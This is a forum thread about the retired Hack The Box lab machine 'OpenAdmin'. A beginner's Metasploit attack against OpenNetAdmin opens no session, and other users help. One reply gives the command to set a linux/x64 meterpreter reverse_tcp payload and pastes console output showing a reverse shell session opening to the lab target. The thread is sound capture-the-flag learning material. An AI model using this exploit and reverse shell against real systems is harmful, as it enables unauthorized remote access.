HTB - OpenAdmin: no session was created.

I use the module in MSF to attack the target machine, but when I execute it, it shows that the session cannot be created. Is there any solution?

This is my setting

This is my execution result

Try the x64 Linux meterpreter payload if the x86 isn’t working.

@Ershu1 said:

I use the module in MSF to attack the target machine, but when I execute it, it shows that the session cannot be created. Is there any solution?

This is a retired box so there are walkthroughs available and there is already a thread where this question would be better placed.

The vast majority of walkthroughs use a different approach and if you look at: Walk-through of OpenAdmin (Hack the Box) – Blog they also found MSF failed to work.

I think the other options are more effective. I certainly can’t get a shell with MSF on this box now (you could last year when it was first active, that might have been patched as an unintended method).

It still works. It just doesn’t work with the x86 payload.
Granted, boxes have their own minds sometimes, but it’s not patched.

@HcKy said:

It still works. It just doesn’t work with the x86 payload.
Granted, boxes have their own minds sometimes, but it’s not patched.

Nice one - thanks for the clarification.

@HcKy said:

Try the x64 Linux meterpreter payload if the x86 isn’t working.

Ok i will try it, thanks for your suggestion

@HcKy said:
Try the x64 Linux meterpreter payload if the x86 isn’t working.

But there is only one payload related to OpenNetAdmin in MSF.
Where should the x64 payload be found, could you please tell me?
Sorry, I just started playing this and I’m not sure

@TazWake said:
@Ershu1 said:

I use the module in MSF to attack the target machine, but when I execute it, it shows that the session cannot be created. Is there any solution?

This is a retired box so there are walkthroughs available and there is already a thread where this question would be better placed.

The vast majority of walkthroughs use a different approach and if you look at: Walk-through of OpenAdmin (Hack the Box) – Blog they also found MSF failed to work.

I think the other options are more effective. I certainly can’t get a shell with MSF on this box now (you could last year when it was first active, that might have been patched as an unintended method).

Ok, I will try other methods too, thank you for suggesting me again.

@Ershu1 said:

@HcKy said:
Try the x64 Linux meterpreter payload if the x86 isn’t working.

But there is only one payload related to OpenNetAdmin in MSF.
Where should the x64 payload be found, could you please tell me?
Sorry, I just started playing this and I’m not sure

You can set your own payload with:
set payload linux/x64/meterpreter/reverse_tcp

I can confirm that works - right now -:

msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > run

[*] Started reverse TCP handler on 10.10.14.34:4444 
[*] Exploiting...
[*] Sending stage (3008420 bytes) to 10.10.10.171
[*] Meterpreter session 1 opened (10.10.14.34:4444 -> 10.10.10.171:37460) at 2021-01-26 14:27:34 +0000

@Ershu1 said:

@HcKy said:
Try the x64 Linux meterpreter payload if the x86 isn’t working.

But there is only one payload related to OpenNetAdmin in MSF.
Where should the x64 payload be found, could you please tell me?
Sorry, I just started playing this and I’m not sure


But as some additional info, the exploits are different than the payloads in Metasploit (and in general). You can see them by doing a “show payloads”.

You’re using exploits to make the machine do something unintended by the developer (like uploading a reverse shell or performing a DoS attack).

There’s all sorts of different payloads you can use along with the exploits, except for when the exploit doesn’t allow for them, obviously.

This one specifically doesn’t work with the 32-bit version of the Linux payload, so you have to use the 64-bit. Metasploit just defaults to the 32-bit payload when you select the exploit.

@TazWake said:

@Ershu1 said:

@HcKy said:
Try the x64 Linux meterpreter payload if the x86 isn’t working.

But there is only one payload related to OpenNetAdmin in MSF.
Where should the x64 payload be found, could you please tell me?
Sorry, I just started playing this and I’m not sure

You can set your own payload with:
set payload linux/x64/meterpreter/reverse_tcp

I can confirm that works - right now -:

msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > run

[*] Started reverse TCP handler on 10.10.14.34:4444 
[*] Exploiting...
[*] Sending stage (3008420 bytes) to 10.10.10.171
[*] Meterpreter session 1 opened (10.10.14.34:4444 -> 10.10.10.171:37460) at 2021-01-26 14:27:34 +0000

Great, I successfully created a session, thank you again for your help

@HcKy said:
@Ershu1 said:

@HcKy said:
Try the x64 Linux meterpreter payload if the x86 isn’t working.

But there is only one payload related to OpenNetAdmin in MSF.
Where should the x64 payload be found, could you please tell me?
Sorry, I just started playing this and I’m not sure

But as some additional info, the exploits are different than the payloads in Metasploit (and in general). You can see them by doing a “show payloads”.

You’re using exploits to make the machine do something unintended by the developer (like uploading a reverse shell or performing a DoS attack).

There’s all sorts of different payloads you can use along with the exploits, except for when the exploit doesn’t allow for them, obviously.

This one specifically doesn’t work with the 32-bit version of the Linux payload, so you have to use the 64-bit. Metasploit just defaults to the 32-bit payload when you select the exploit.

Okay, thank you for your explanation, let me know why I couldn’t create a session successfully.
Respect to HcKy.